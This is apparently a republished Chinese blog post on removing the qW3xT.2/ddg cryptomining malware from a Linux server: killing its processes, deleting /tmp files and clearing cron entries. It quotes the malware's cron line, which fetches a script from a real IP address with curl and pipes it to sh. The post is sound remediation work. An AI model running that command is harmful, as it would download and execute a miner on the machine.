qW3xT.2，解决挖矿病毒。

标签：服务器   在服务器   文件夹   http   挖矿病毒   cpu   roo   tmp   创建   

首先杀死进程：

1.首先，将 CPU 占满的进程杀死
2.它有一个 守护进程 ps -aux|grep ddg

删除文件：

1.进入/tmp文件夹下。发现qW3xT.2文件，删除。
2.删除/tmp目录下的所有的对应ddg

删除计划任务：

[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l
/15 * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
删除计划任务 crontab -r

删除脚本：

发现计划任务在服务器中创建了几个文件，
/var/spool/cron/crontabs/root
将root文件删除。
/var/spool/cron/root
内容是/15 * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。
（与计划任务相同）
将计划任务中创建的文件删除。

qW3xT.2，解决挖矿病毒。

标签：服务器   在服务器   文件夹   http   挖矿病毒   cpu   roo   tmp   创建   

原文地址：https://www.cnblogs.com/lvhaosir6/p/9610360.html